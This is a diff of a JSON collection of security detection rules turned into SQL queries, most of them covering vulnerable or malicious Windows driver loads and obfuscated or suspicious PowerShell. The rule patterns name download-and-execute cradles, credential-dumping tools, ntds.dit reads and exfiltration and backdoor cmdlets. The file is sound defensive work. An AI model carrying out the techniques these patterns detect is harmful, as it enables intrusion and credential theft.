"attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", @@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE 